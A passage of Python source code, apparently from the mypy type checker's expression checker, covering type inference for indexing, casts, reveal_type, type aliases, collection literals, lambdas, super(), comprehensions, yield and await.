return self.nonliteral_tuple_index_helper(left_type, slic)
return left_type.slice(begin, stride, end)
def nonliteral_tuple_index_helper(self, left_type: TupleType, index: Expression) -> Type:
index_type = self.accept(index)
expected_type = UnionType.make_union([self.named_type('builtins.int'),
self.named_type('builtins.slice')])
if not self.chk.check_subtype(index_type, expected_type, index,
messages.INVALID_TUPLE_INDEX_TYPE,
'actual type', 'expected type'):
return AnyType(TypeOfAny.from_error)
else:
return UnionType.make_simplified_union(left_type.items)
def _get_value(self, index: Expression) -> Optional[int]:
if isinstance(index, IntExpr):
return index.value
elif isinstance(index, UnaryExpr):
if index.op == '-':
operand = index.expr
if isinstance(operand, IntExpr):
return -1 * operand.value
return None
def visit_typeddict_index_expr(self, td_type: TypedDictType, index: Expression) -> Type:
if not isinstance(index, (StrExpr, UnicodeExpr)):
self.msg.typeddict_key_must_be_string_literal(td_type, index)
return AnyType(TypeOfAny.from_error)
item_name = index.value
item_type = td_type.items.get(item_name)
if item_type is None:
self.msg.typeddict_key_not_found(td_type, item_name, index)
return AnyType(TypeOfAny.from_error)
return item_type
def visit_enum_index_expr(self, enum_type: TypeInfo, index: Expression,
context: Context) -> Type:
string_type = self.named_type('builtins.str') # type: Type
if self.chk.options.python_version[0] < 3:
string_type = UnionType.make_union([string_type,
self.named_type('builtins.unicode')])
self.chk.check_subtype(self.accept(index), string_type, context,
"Enum index should be a string", "actual index type")
return Instance(enum_type, [])
def visit_cast_expr(self, expr: CastExpr) -> Type:
"""Type check a cast expression."""
source_type = self.accept(expr.expr, type_context=AnyType(TypeOfAny.special_form),
allow_none_return=True, always_allow_any=True)
target_type = expr.type
options = self.chk.options
if options.warn_redundant_casts and is_same_type(source_type, target_type):
self.msg.redundant_cast(target_type, expr)
if options.disallow_any_unimported and has_any_from_unimported_type(target_type):
self.msg.unimported_type_becomes_any("Target type of cast", target_type, expr)
check_for_explicit_any(target_type, self.chk.options, self.chk.is_typeshed_stub, self.msg,
context=expr)
return target_type
def visit_reveal_expr(self, expr: RevealExpr) -> Type:
"""Type check a reveal_type expression."""
if expr.kind == REVEAL_TYPE:
assert expr.expr is not None
revealed_type = self.accept(expr.expr, type_context=self.type_context[-1])
if not self.chk.current_node_deferred:
self.msg.reveal_type(revealed_type, expr)
if not self.chk.in_checked_function():
self.msg.note("'reveal_type' always outputs 'Any' in unchecked functions",
expr)
return revealed_type
else:
# REVEAL_LOCALS
if not self.chk.current_node_deferred:
# the RevealExpr contains a local_nodes attribute,
# calculated at semantic analysis time. Use it to pull out the
# corresponding subset of variables in self.chk.type_map
names_to_types = {
var_node.name(): var_node.type for var_node in expr.local_nodes
} if expr.local_nodes is not None else {}
self.msg.reveal_locals(names_to_types, expr)
return NoneTyp()
def visit_type_application(self, tapp: TypeApplication) -> Type:
"""Type check a type application (expr[type, ...]).
There are two different options here, depending on whether expr refers
to a type alias or directly to a generic class. In the first case we need
to use a dedicated function typeanal.expand_type_aliases. This
is due to the fact that currently type aliases machinery uses
unbound type variables, while normal generics use bound ones;
see TypeAlias docstring for more details.
"""
if isinstance(tapp.expr, RefExpr) and isinstance(tapp.expr.node, TypeAlias):
# Subscription of a (generic) alias in runtime context, expand the alias.
target = tapp.expr.node.target
all_vars = tapp.expr.node.alias_tvars
item = expand_type_alias(target, all_vars, tapp.types, self.chk.fail,
tapp.expr.node.no_args, tapp)
if isinstance(item, Instance):
tp = type_object_type(item.type, self.named_type)
return self.apply_type_arguments_to_callable(tp, item.args, tapp)
else:
self.chk.fail(messages.ONLY_CLASS_APPLICATION, tapp)
return AnyType(TypeOfAny.from_error)
# Type application of a normal generic class in runtime context.
# This is typically used as `x = G[int]()`.
tp = self.accept(tapp.expr)
if isinstance(tp, (CallableType, Overloaded)):
if not tp.is_type_obj():
self.chk.fail(messages.ONLY_CLASS_APPLICATION, tapp)
return self.apply_type_arguments_to_callable(tp, tapp.types, tapp)
if isinstance(tp, AnyType):
return AnyType(TypeOfAny.from_another_any, source_any=tp)
return AnyType(TypeOfAny.special_form)
def visit_type_alias_expr(self, alias: TypeAliasExpr) -> Type:
"""Right hand side of a type alias definition.
It has the same type as if the alias itself was used in a runtime context.
For example, here:
A = reveal_type(List[T])
reveal_type(A)
both `reveal_type` instances will reveal the same type `def (...) -> builtins.list[Any]`.
Note that type variables are implicitly substituted with `Any`.
"""
return self.alias_type_in_runtime_context(alias.type, alias.tvars, alias.no_args,
alias, alias_definition=True)
def alias_type_in_runtime_context(self, target: Type, alias_tvars: List[str],
no_args: bool, ctx: Context,
*,
alias_definition: bool = False) -> Type:
"""Get type of a type alias (could be generic) in a runtime expression.
Note that this function can be called only if the alias appears _not_
as a target of type application, which is treated separately in the
visit_type_application method. Some examples where this method is called are
casts and instantiation:
class LongName(Generic[T]): ...
A = LongName[int]
x = A()
y = cast(A, ...)
"""
if isinstance(target, Instance) and target.invalid:
# An invalid alias, error already has been reported
return AnyType(TypeOfAny.from_error)
# If this is a generic alias, we set all variables to `Any`.
# For example:
# A = List[Tuple[T, T]]
# x = A() <- same as List[Tuple[Any, Any]], see PEP 484.
item = set_any_tvars(target, alias_tvars, ctx.line, ctx.column)
if isinstance(item, Instance):
# Normally we get a callable type (or overloaded) with .is_type_obj() true
# representing the class's constructor
tp = type_object_type(item.type, self.named_type)
if no_args:
return tp
return self.apply_type_arguments_to_callable(tp, item.args, ctx)
elif (isinstance(item, TupleType) and
# Tuple[str, int]() fails at runtime, only named tuples and subclasses work.
item.fallback.type.fullname() != 'builtins.tuple'):
return type_object_type(item.fallback.type, self.named_type)
elif isinstance(item, AnyType):
return AnyType(TypeOfAny.from_another_any, source_any=item)
else:
if alias_definition:
return AnyType(TypeOfAny.special_form)
# This type is invalid in most runtime contexts.
self.msg.alias_invalid_in_runtime_context(item, ctx)
return AnyType(TypeOfAny.from_error)
def apply_type_arguments_to_callable(self, tp: Type, args: List[Type], ctx: Context) -> Type:
"""Apply type arguments to a generic callable type coming from a type object.
This will first perform type arguments count checks, report the
error as needed, and return the correct kind of Any. As a special
case this returns Any for non-callable types, because if type object type
is not callable, then an error should be already reported.
"""
if isinstance(tp, CallableType):
if len(tp.variables) != len(args):
self.msg.incompatible_type_application(len(tp.variables),
len(args), ctx)
return AnyType(TypeOfAny.from_error)
return self.apply_generic_arguments(tp, args, ctx)
if isinstance(tp, Overloaded):
for it in tp.items():
if len(it.variables) != len(args):
self.msg.incompatible_type_application(len(it.variables),
len(args), ctx)
return AnyType(TypeOfAny.from_error)
return Overloaded([self.apply_generic_arguments(it, args, ctx)
for it in tp.items()])
return AnyType(TypeOfAny.special_form)
def visit_list_expr(self, e: ListExpr) -> Type:
"""Type check a list expression [...]."""
return self.check_lst_expr(e.items, 'builtins.list', '<list>', e)
def visit_set_expr(self, e: SetExpr) -> Type:
return self.check_lst_expr(e.items, 'builtins.set', '<set>', e)
def check_lst_expr(self, items: List[Expression], fullname: str,
tag: str, context: Context) -> Type:
# Translate into type checking a generic function call.
# Used for list and set expressions, as well as for tuples
# containing star expressions that don't refer to a
# Tuple. (Note: "lst" stands for list-set-tuple. :-)
tvdef = TypeVarDef('T', 'T', -1, [], self.object_type())
tv = TypeVarType(tvdef)
constructor = CallableType(
[tv],
[nodes.ARG_STAR],
[None],
self.chk.named_generic_type(fullname, [tv]),
self.named_type('builtins.function'),
name=tag,
variables=[tvdef])
return self.check_call(constructor,
[(i.expr if isinstance(i, StarExpr) else i)
for i in items],
[(nodes.ARG_STAR if isinstance(i, StarExpr) else nodes.ARG_POS)
for i in items],
context)[0]
def visit_tuple_expr(self, e: TupleExpr) -> Type:
"""Type check a tuple expression."""
# Try to determine type context for type inference.
type_context = self.type_context[-1]
type_context_items = None
if isinstance(type_context, UnionType):
tuples_in_context = [t for t in type_context.items
if (isinstance(t, TupleType) and len(t.items) == len(e.items)) or
is_named_instance(t, 'builtins.tuple')]
if len(tuples_in_context) == 1:
type_context = tuples_in_context[0]
else:
# There are either no relevant tuples in the Union, or there is
# more than one. Either way, we can't decide on a context.
pass
if isinstance(type_context, TupleType):
type_context_items = type_context.items
elif type_context and is_named_instance(type_context, 'builtins.tuple'):
assert isinstance(type_context, Instance)
if type_context.args:
type_context_items = [type_context.args[0]] * len(e.items)
# NOTE: it's possible for the context to have a different
# number of items than e. In that case we use those context
# items that match a position in e, and we'll worry about type
# mismatches later.
# Infer item types. Give up if there's a star expression
# that's not a Tuple.
items = [] # type: List[Type]
j = 0 # Index into type_context_items; irrelevant if type_context_items is none
for i in range(len(e.items)):
item = e.items[i]
if isinstance(item, StarExpr):
# Special handling for star expressions.
# TODO: If there's a context, and item.expr is a
# TupleExpr, flatten it, so we can benefit from the
# context? Counterargument: Why would anyone write
# (1, *(2, 3)) instead of (1, 2, 3) except in a test?
tt = self.accept(item.expr)
if isinstance(tt, TupleType):
items.extend(tt.items)
j += len(tt.items)
else:
# A star expression that's not a Tuple.
# Treat the whole thing as a variable-length tuple.
return self.check_lst_expr(e.items, 'builtins.tuple', '<tuple>', e)
else:
if not type_context_items or j >= len(type_context_items):
tt = self.accept(item)
else:
tt = self.accept(item, type_context_items[j])
j += 1
items.append(tt)
fallback_item = join.join_type_list(items)
return TupleType(items, self.chk.named_generic_type('builtins.tuple', [fallback_item]))
def visit_dict_expr(self, e: DictExpr) -> Type:
"""Type check a dict expression.
Translate it into a call to dict(), with provisions for **expr.
"""
# if the dict literal doesn't match TypedDict, check_typeddict_call_with_dict reports
# an error, but returns the TypedDict type that matches the literal it found
# that would cause a second error when that TypedDict type is returned upstream
# to avoid the second error, we always return TypedDict type that was requested
typeddict_context = self.find_typeddict_context(self.type_context[-1])
if typeddict_context:
self.check_typeddict_call_with_dict(
callee=typeddict_context,
kwargs=e,
context=e
)
return typeddict_context.copy_modified()
# Collect function arguments, watching out for **expr.
args = [] # type: List[Expression] # Regular "key: value"
stargs = [] # type: List[Expression] # For "**expr"
for key, value in e.items:
if key is None:
stargs.append(value)
else:
args.append(TupleExpr([key, value]))
# Define type variables (used in constructors below).
ktdef = TypeVarDef('KT', 'KT', -1, [], self.object_type())
vtdef = TypeVarDef('VT', 'VT', -2, [], self.object_type())
kt = TypeVarType(ktdef)
vt = TypeVarType(vtdef)
rv = None
# Call dict(*args), unless it's empty and stargs is not.
if args or not stargs:
# The callable type represents a function like this:
#
# def <unnamed>(*v: Tuple[kt, vt]) -> Dict[kt, vt]: ...
constructor = CallableType(
[TupleType([kt, vt], self.named_type('builtins.tuple'))],
[nodes.ARG_STAR],
[None],
self.chk.named_generic_type('builtins.dict', [kt, vt]),
self.named_type('builtins.function'),
name='<dict>',
variables=[ktdef, vtdef])
rv = self.check_call(constructor, args, [nodes.ARG_POS] * len(args), e)[0]
else:
# dict(...) will be called below.
pass
# Call rv.update(arg) for each arg in **stargs,
# except if rv isn't set yet, then set rv = dict(arg).
if stargs:
for arg in stargs:
if rv is None:
constructor = CallableType(
[self.chk.named_generic_type('typing.Mapping', [kt, vt])],
[nodes.ARG_POS],
[None],
self.chk.named_generic_type('builtins.dict', [kt, vt]),
self.named_type('builtins.function'),
name='<list>',
variables=[ktdef, vtdef])
rv = self.check_call(constructor, [arg], [nodes.ARG_POS], arg)[0]
else:
self.check_method_call_by_name('update', rv, [arg], [nodes.ARG_POS], arg)
assert rv is not None
return rv
def find_typeddict_context(self, context: Optional[Type]) -> Optional[TypedDictType]:
if isinstance(context, TypedDictType):
return context
elif isinstance(context, UnionType):
items = []
for item in context.items:
item_context = self.find_typeddict_context(item)
if item_context:
items.append(item_context)
if len(items) == 1:
# Only one union item is TypedDict, so use the context as it's unambiguous.
return items[0]
# No TypedDict type in context.
return None
def visit_lambda_expr(self, e: LambdaExpr) -> Type:
"""Type check lambda expression."""
inferred_type, type_override = self.infer_lambda_type_using_context(e)
if not inferred_type:
self.chk.return_types.append(AnyType(TypeOfAny.special_form))
# No useful type context.
ret_type = self.accept(e.expr(), allow_none_return=True)
fallback = self.named_type('builtins.function')
self.chk.return_types.pop()
return callable_type(e, fallback, ret_type)
else:
# Type context available.
self.chk.return_types.append(inferred_type.ret_type)
self.chk.check_func_item(e, type_override=type_override)
if e.expr() not in self.chk.type_map:
self.accept(e.expr(), allow_none_return=True)
ret_type = self.chk.type_map[e.expr()]
if isinstance(ret_type, NoneTyp):
# For "lambda ...: None", just use type from the context.
# Important when the context is Callable[..., None] which
# really means Void. See #1425.
self.chk.return_types.pop()
return inferred_type
self.chk.return_types.pop()
return replace_callable_return_type(inferred_type, ret_type)
def infer_lambda_type_using_context(self, e: LambdaExpr) -> Tuple[Optional[CallableType],
Optional[CallableType]]:
"""Try to infer lambda expression type using context.
Return None if could not infer type.
The second item in the return type is the type_override parameter for check_func_item.
"""
# TODO also accept 'Any' context
ctx = self.type_context[-1]
if isinstance(ctx, UnionType):
callables = [t for t in ctx.relevant_items() if isinstance(t, CallableType)]
if len(callables) == 1:
ctx = callables[0]
if not ctx or not isinstance(ctx, CallableType):
return None, None
# The context may have function type variables in it. We replace them
# since these are the type variables we are ultimately trying to infer;
# they must be considered as indeterminate. We use ErasedType since it
# does not affect type inference results (it is for purposes like this
# only).
callable_ctx = replace_meta_vars(ctx, ErasedType())
assert isinstance(callable_ctx, CallableType)
arg_kinds = [arg.kind for arg in e.arguments]
if callable_ctx.is_ellipsis_args:
# Fill in Any arguments to match the arguments of the lambda.
callable_ctx = callable_ctx.copy_modified(
is_ellipsis_args=False,
arg_types=[AnyType(TypeOfAny.special_form)] * len(arg_kinds),
arg_kinds=arg_kinds,
arg_names=[None] * len(arg_kinds)
)
if ARG_STAR in arg_kinds or ARG_STAR2 in arg_kinds:
# TODO treat this case appropriately
return callable_ctx, None
if callable_ctx.arg_kinds != arg_kinds:
# Incompatible context; cannot use it to infer types.
self.chk.fail(messages.CANNOT_INFER_LAMBDA_TYPE, e)
return None, None
return callable_ctx, callable_ctx
def visit_super_expr(self, e: SuperExpr) -> Type:
"""Type check a super expression (non-lvalue)."""
self.check_super_arguments(e)
t = self.analyze_super(e, False)
return t
def check_super_arguments(self, e: SuperExpr) -> None:
"""Check arguments in a super(...) call."""
if ARG_STAR in e.call.arg_kinds:
self.chk.fail('Varargs not supported with "super"', e)
elif e.call.args and set(e.call.arg_kinds) != {ARG_POS}:
self.chk.fail('"super" only accepts positional arguments', e)
elif len(e.call.args) == 1:
self.chk.fail('"super" with a single argument not supported', e)
elif len(e.call.args) > 2:
self.chk.fail('Too many arguments for "super"', e)
elif self.chk.options.python_version[0] == 2 and len(e.call.args) == 0:
self.chk.fail('Too few arguments for "super"', e)
elif len(e.call.args) == 2:
type_obj_type = self.accept(e.call.args[0])
instance_type = self.accept(e.call.args[1])
if isinstance(type_obj_type, FunctionLike) and type_obj_type.is_type_obj():
type_info = type_obj_type.type_object()
elif isinstance(type_obj_type, TypeType):
item = type_obj_type.item
if isinstance(item, AnyType):
# Could be anything.
return
if isinstance(item, TupleType):
item = item.fallback # Handle named tuples and other Tuple[...] subclasses.
if not isinstance(item, Instance):
# A complicated type object type. Too tricky, give up.
# TODO: Do something more clever here.
self.chk.fail('Unsupported argument 1 for "super"', e)
return
type_info = item.type
elif isinstance(type_obj_type, AnyType):
return
else:
self.msg.first_argument_for_super_must_be_type(type_obj_type, e)
return
if isinstance(instance_type, (Instance, TupleType, TypeVarType)):
if isinstance(instance_type, TypeVarType):
# Needed for generic self.
instance_type = instance_type.upper_bound
if not isinstance(instance_type, (Instance, TupleType)):
# Too tricky, give up.
# TODO: Do something more clever here.
self.chk.fail(messages.UNSUPPORTED_ARGUMENT_2_FOR_SUPER, e)
return
if isinstance(instance_type, TupleType):
# Needed for named tuples and other Tuple[...] subclasses.
instance_type = instance_type.fallback
if type_info not in instance_type.type.mro:
self.chk.fail('Argument 2 for "super" not an instance of argument 1', e)
elif isinstance(instance_type, TypeType) or (isinstance(instance_type, FunctionLike)
and instance_type.is_type_obj()):
# TODO: Check whether this is a valid type object here.
pass
elif not isinstance(instance_type, AnyType):
self.chk.fail(messages.UNSUPPORTED_ARGUMENT_2_FOR_SUPER, e)
def analyze_super(self, e: SuperExpr, is_lvalue: bool) -> Type:
"""Type check a super expression."""
if e.info and e.info.bases:
# TODO fix multiple inheritance etc
if len(e.info.mro) < 2:
self.chk.fail('Internal error: unexpected mro for {}: {}'.format(
e.info.name(), e.info.mro), e)
return AnyType(TypeOfAny.from_error)
for base in e.info.mro[1:]:
if e.name in base.names or base == e.info.mro[-1]:
if e.info.fallback_to_any and base == e.info.mro[-1]:
# There's an undefined base class, and we're
# at the end of the chain. That's not an error.
return AnyType(TypeOfAny.special_form)
if not self.chk.in_checked_function():
return AnyType(TypeOfAny.unannotated)
if self.chk.scope.active_class() is not None:
self.chk.fail('super() outside of a method is not supported', e)
return AnyType(TypeOfAny.from_error)
method = self.chk.scope.top_function()
assert method is not None
args = method.arguments
# super() in a function with empty args is an error; we
# need something in declared_self.
if not args:
self.chk.fail(
'super() requires one or more positional arguments in '
'enclosing function', e)
return AnyType(TypeOfAny.from_error)
declared_self = args[0].variable.type or fill_typevars(e.info)
return analyze_member_access(name=e.name, typ=fill_typevars(e.info), node=e,
is_lvalue=False, is_super=True, is_operator=False,
builtin_type=self.named_type,
not_ready_callback=self.not_ready_callback,
msg=self.msg, override_info=base,
original_type=declared_self, chk=self.chk)
assert False, 'unreachable'
else:
# Invalid super. This has been reported by the semantic analyzer.
return AnyType(TypeOfAny.from_error)
def visit_slice_expr(self, e: SliceExpr) -> Type:
expected = make_optional_type(self.named_type('builtins.int'))
for index in [e.begin_index, e.end_index, e.stride]:
if index:
t = self.accept(index)
self.chk.check_subtype(t, expected,
index, messages.INVALID_SLICE_INDEX)
return self.named_type('builtins.slice')
def visit_list_comprehension(self, e: ListComprehension) -> Type:
return self.check_generator_or_comprehension(
e.generator, 'builtins.list', '<list-comprehension>')
def visit_set_comprehension(self, e: SetComprehension) -> Type:
return self.check_generator_or_comprehension(
e.generator, 'builtins.set', '<set-comprehension>')
def visit_generator_expr(self, e: GeneratorExpr) -> Type:
# If any of the comprehensions use async for, the expression will return an async generator
# object
if any(e.is_async):
typ = 'typing.AsyncGenerator'
# received type is always None in async generator expressions
additional_args = [NoneTyp()] # type: List[Type]
else:
typ = 'typing.Generator'
# received type and returned type are None
additional_args = [NoneTyp(), NoneTyp()]
return self.check_generator_or_comprehension(e, typ, '<generator>',
additional_args=additional_args)
def check_generator_or_comprehension(self, gen: GeneratorExpr,
type_name: str,
id_for_messages: str,
additional_args: List[Type] = []) -> Type:
"""Type check a generator expression or a list comprehension."""
with self.chk.binder.frame_context(can_skip=True, fall_through=0):
self.check_for_comp(gen)
# Infer the type of the list comprehension by using a synthetic generic
# callable type.
tvdef = TypeVarDef('T', 'T', -1, [], self.object_type())
tv_list = [TypeVarType(tvdef)] # type: List[Type]
constructor = CallableType(
tv_list,
[nodes.ARG_POS],
[None],
self.chk.named_generic_type(type_name, tv_list + additional_args),
self.chk.named_type('builtins.function'),
name=id_for_messages,
variables=[tvdef])
return self.check_call(constructor,
[gen.left_expr], [nodes.ARG_POS], gen)[0]
def visit_dictionary_comprehension(self, e: DictionaryComprehension) -> Type:
"""Type check a dictionary comprehension."""
with self.chk.binder.frame_context(can_skip=True, fall_through=0):
self.check_for_comp(e)
# Infer the type of the list comprehension by using a synthetic generic
# callable type.
ktdef = TypeVarDef('KT', 'KT', -1, [], self.object_type())
vtdef = TypeVarDef('VT', 'VT', -2, [], self.object_type())
kt = TypeVarType(ktdef)
vt = TypeVarType(vtdef)
constructor = CallableType(
[kt, vt],
[nodes.ARG_POS, nodes.ARG_POS],
[None, None],
self.chk.named_generic_type('builtins.dict', [kt, vt]),
self.chk.named_type('builtins.function'),
name='<dictionary-comprehension>',
variables=[ktdef, vtdef])
return self.check_call(constructor,
[e.key, e.value], [nodes.ARG_POS, nodes.ARG_POS], e)[0]
def check_for_comp(self, e: Union[GeneratorExpr, DictionaryComprehension]) -> None:
"""Check the for_comp part of comprehensions. That is the part from 'for':
... for x in y if z
Note: This adds the type information derived from the condlists to the current binder.
"""
for index, sequence, conditions, is_async in zip(e.indices, e.sequences,
e.condlists, e.is_async):
if is_async:
_, sequence_type = self.chk.analyze_async_iterable_item_type(sequence)
else:
_, sequence_type = self.chk.analyze_iterable_item_type(sequence)
self.chk.analyze_index_variables(index, sequence_type, True, e)
for condition in conditions:
self.accept(condition)
# values are only part of the comprehension when all conditions are true
true_map, _ = self.chk.find_isinstance_check(condition)
if true_map:
for var, type in true_map.items():
self.chk.binder.put(var, type)
def visit_conditional_expr(self, e: ConditionalExpr) -> Type:
self.accept(e.cond)
ctx = self.type_context[-1]
# Gain type information from isinstance if it is there
# but only for the current expression
if_map, else_map = self.chk.find_isinstance_check(e.cond)
if_type = self.analyze_cond_branch(if_map, e.if_expr, context=ctx)
if not mypy.checker.is_valid_inferred_type(if_type):
# Analyze the right branch disregarding the left branch.
else_type = self.analyze_cond_branch(else_map, e.else_expr, context=ctx)
# If it would make a difference, re-analyze the left
# branch using the right branch's type as context.
if ctx is None or not is_equivalent(else_type, ctx):
# TODO: If it's possible that the previous analysis of
# the left branch produced errors that are avoided
# using this context, suppress those errors.
if_type = self.analyze_cond_branch(if_map, e.if_expr, context=else_type)
else:
# Analyze the right branch in the context of the left
# branch's type.
else_type = self.analyze_cond_branch(else_map, e.else_expr, context=if_type)
# Only create a union type if the type context is a union, to be mostly
# compatible with older mypy versions where we always did a join.
#
# TODO: Always create a union or at least in more cases?
if isinstance(self.type_context[-1], UnionType):
res = UnionType.make_simplified_union([if_type, else_type])
else:
res = join.join_types(if_type, else_type)
return res
def analyze_cond_branch(self, map: Optional[Dict[Expression, Type]],
node: Expression, context: Optional[Type]) -> Type:
with self.chk.binder.frame_context(can_skip=True, fall_through=0):
if map is None:
# We still need to type check node, in case we want to
# process it for isinstance checks later
self.accept(node, type_context=context)
return UninhabitedType()
self.chk.push_type_map(map)
return self.accept(node, type_context=context)
def visit_backquote_expr(self, e: BackquoteExpr) -> Type:
self.accept(e.expr)
return self.named_type('builtins.str')
#
# Helpers
#
def accept(self,
node: Expression,
type_context: Optional[Type] = None,
allow_none_return: bool = False,
always_allow_any: bool = False,
) -> Type:
"""Type check a node in the given type context. If allow_none_return
is True and this expression is a call, allow it to return None. This
applies only to this expression and not any subexpressions.
"""
if node in self.type_overrides:
return self.type_overrides[node]
self.type_context.append(type_context)
try:
if allow_none_return and isinstance(node, CallExpr):
typ = self.visit_call_expr(node, allow_none_return=True)
elif allow_none_return and isinstance(node, YieldFromExpr):
typ = self.visit_yield_from_expr(node, allow_none_return=True)
else:
typ = node.accept(self)
except Exception as err:
report_internal_error(err, self.chk.errors.file,
node.line, self.chk.errors, self.chk.options)
self.type_context.pop()
assert typ is not None
self.chk.store_type(node, typ)
if (self.chk.options.disallow_any_expr and
not always_allow_any and
not self.chk.is_stub and
self.chk.in_checked_function() and
has_any_type(typ)):
self.msg.disallowed_any_type(typ, node)
if not self.chk.in_checked_function():
return AnyType(TypeOfAny.unannotated)
else:
return typ
def named_type(self, name: str) -> Instance:
"""Return an instance type with type given by the name and no type
arguments. Alias for TypeChecker.named_type.
"""
return self.chk.named_type(name)
def is_valid_var_arg(self, typ: Type) -> bool:
"""Is a type valid as a *args argument?"""
return (isinstance(typ, TupleType) or
is_subtype(typ, self.chk.named_generic_type('typing.Iterable',
[AnyType(TypeOfAny.special_form)])) or
isinstance(typ, AnyType))
def is_valid_keyword_var_arg(self, typ: Type) -> bool:
"""Is a type valid as a **kwargs argument?"""
if self.chk.options.python_version[0] >= 3:
return is_subtype(typ, self.chk.named_generic_type(
'typing.Mapping', [self.named_type('builtins.str'),
AnyType(TypeOfAny.special_form)]))
else:
return (
is_subtype(typ, self.chk.named_generic_type(
'typing.Mapping',
[self.named_type('builtins.str'),
AnyType(TypeOfAny.special_form)]))
or
is_subtype(typ, self.chk.named_generic_type(
'typing.Mapping',
[self.named_type('builtins.unicode'),
AnyType(TypeOfAny.special_form)])))
def has_member(self, typ: Type, member: str) -> bool:
"""Does type have member with the given name?"""
# TODO: refactor this to use checkmember.analyze_member_access, otherwise
# these two should be carefully kept in sync.
if isinstance(typ, TypeVarType):
typ = typ.upper_bound
if isinstance(typ, TupleType):
typ = typ.fallback
if isinstance(typ, Instance):
return typ.type.has_readable_member(member)
if isinstance(typ, CallableType) and typ.is_type_obj():
return typ.fallback.type.has_readable_member(member)
elif isinstance(typ, AnyType):
return True
elif isinstance(typ, UnionType):
result = all(self.has_member(x, member) for x in typ.relevant_items())
return result
elif isinstance(typ, TypeType):
# Type[Union[X, ...]] is always normalized to Union[Type[X], ...],
# so we don't need to care about unions here.
item = typ.item
if isinstance(item, TypeVarType):
item = item.upper_bound
if isinstance(item, TupleType):
item = item.fallback
if isinstance(item, Instance) and item.type.metaclass_type is not None:
return self.has_member(item.type.metaclass_type, member)
if isinstance(item, AnyType):
return True
return False
else:
return False
def not_ready_callback(self, name: str, context: Context) -> None:
"""Called when we can't infer the type of a variable because it's not ready yet.
Either defer type checking of the enclosing function to the next
pass or report an error.
"""
self.chk.handle_cannot_determine_type(name, context)
def visit_yield_expr(self, e: YieldExpr) -> Type:
return_type = self.chk.return_types[-1]
expected_item_type = self.chk.get_generator_yield_type(return_type, False)
if e.expr is None:
if (not isinstance(expected_item_type, (NoneTyp, AnyType))
and self.chk.in_checked_function()):
self.chk.fail(messages.YIELD_VALUE_EXPECTED, e)
else:
actual_item_type = self.accept(e.expr, expected_item_type)
self.chk.check_subtype(actual_item_type, expected_item_type, e,
messages.INCOMPATIBLE_TYPES_IN_YIELD,
'actual type', 'expected type')
return self.chk.get_generator_receive_type(return_type, False)
def visit_await_expr(self, e: AwaitExpr) -> Type:
expected_type = self.type_context[-1]
if expected_type is not None:
expected_type = self.chk.named_generic_type('typing.Awaitable', [expected_type])
actual_type = self.accept(e.expr, expected_type)
if isinstance(actual_type, AnyType):
return AnyType(TypeOfAny.from_another_any, source_any=actual_type)
return self.check_awaitable_expr(actual_type, e, messages.INCOMPATIBLE_TYPES_IN_AWAIT)
def check_awaitable_expr(self, t: Type, ctx: Context, msg: str) -> Type:
"""Check the argument to `await` and extract the type of value.
Also used by `async for` and `async with`.
"""
if not self.chk.check_subtype(t, self.named_type('typing.Awaitable'), ctx,
msg, 'actual type', 'expected type'):
return AnyType(TypeOfAny.special_form)
else:
generator = self.check_method_call_by_name('__await__', t, [], [], ctx)[0]
return self.chk.get_generator_return_type(generator, False)
def visit_yield_from_expr(self, e: YieldFromExpr, allow_none_return: bool = False) -> Type:
# NOTE: Whether `yield from` accepts an `async def` decorated
# with `@types.coroutine` (or `@asyncio.coroutine`) depends on
# whether the generator containing the `yield from` is itself
# thus decorated. But it accepts a generator regardless of
# how it's decorated.
return_type = self.chk.return_types[-1]
# TODO: What should the context for the sub-expression be?
# If the containing function has type Generator[X, Y, ...],
# the context should be Generator[X, Y, T], where T is the
# context of the 'yield from' itself (but it isn't known).
subexpr_type = self.accept(e.expr)
# Check that the expr is an instance of Iterable and get the type of the iterator produced
# by __iter__.
if isinstance(subexpr_type, AnyType):
iter_type = AnyType(TypeOfAny.from_another_any, source_any=subexpr_type) # type: Type
elif self.chk.type_is_iterable(subexpr_type):
if is_async_def(subexpr_type) and not has_coroutine_decorator(return_type):
self.chk.msg.yield_from_invalid_operand_type(subexpr_type, e)
any_type = AnyType(TypeOfAny.special_form)
generic_generator_type = self.chk.named_generic_type('typing.Generator',
[any_type, any_type, any_type])
iter_type, _ = self.check_method_call_by_name(
'__iter__', subexpr_type, [], [], context=generic_generator_type)
else:
if not (is_async_def(subexpr_type) and has_coroutine_decorator(return_type)):
self.chk.msg.yield_from_invalid_operand_type(subexpr_type, e)
iter_type = AnyType(TypeOfAny.from_error)
else:
iter_type = self.check_awaitable_expr(subexpr_type, e,
messages.INCOMPATIBLE_TYPES_IN_YIELD_FROM)
# Check that the iterator's item type matches the type yielded by the Generator function
# containing this `yield from` expression.
expected_item_type = self.chk.get_generator_yield_type(return_type, False)
actual_item_type = self.chk.get_generator_yield_type(iter_type, False)
self.chk.check_subtype(actual_item_type, expected_item_type, e,
messages.INCOMPATIBLE_TYPES_IN_YIELD_FROM,
'actual type', 'expected type')
# Determine the type of the entire yield from expression.
if (isinstance(iter_type, Instance) and
iter_type.type.fullname() == 'typing.Generator'):
expr_type = self.chk.get_generator_return_type(iter_type, False)
else:
# Non-Generators don't return anything from `yield from` expressions.
# However special-case Any (which might be produced by an error).
if isinstance(actual_item_type, AnyType):
expr_type = AnyType(TypeOfAny.from_another_any, source_any=actual_item_type)
else:
# Treat `Iterator[X]` as a shorthand for `Generator[X, None, Any]`.
expr_type = NoneTyp()
if not allow_none_return and isinstance(expr_type, NoneTyp):
self.chk.msg.does_not_return_value(None, e)
return expr_type
def visit_temp_node(self, e: TempNode) -> Type:
return e.type
def visit_type_var_expr(self, e: TypeVarExpr) -> Type:
return AnyType(TypeOfAny.special_form)
def visit_newtype_expr(self, e: NewTypeExpr) -> Type:
return AnyType(TypeOfAny.special_form)
def visit_namedtuple_expr(self, e: NamedTupleExpr) -> Type:
tuple_type = e.info.tuple_type
if tuple_type:
if (self.chk.options.disallow_any_unimported and
has_any_from_unimported_type(tuple_type)):
self.msg.unimported_type_becomes_any("NamedTuple type", tuple_type, e)
check_for_explicit_any(tuple_type, self.chk.options, self.chk.is_typeshed_stub,
self.msg, context=e)
return AnyType(TypeOfAny.special_form)
def visit_enum_call_expr(self, e: EnumCallExpr) -> Type:
for name, value in zip(e.items, e.values):
if value is not None:
typ = self.accept(value)
if not isinstance(typ, AnyType):
var = e.info.names[name].node
if isinstance(var, Var):
# Inline TypeChecker.set_inferred_type(),
# without the lvalue. (This doesn't really do
# much, since the value attribute is defined
# to have type Any in the typeshed stub.)
var.type = typ
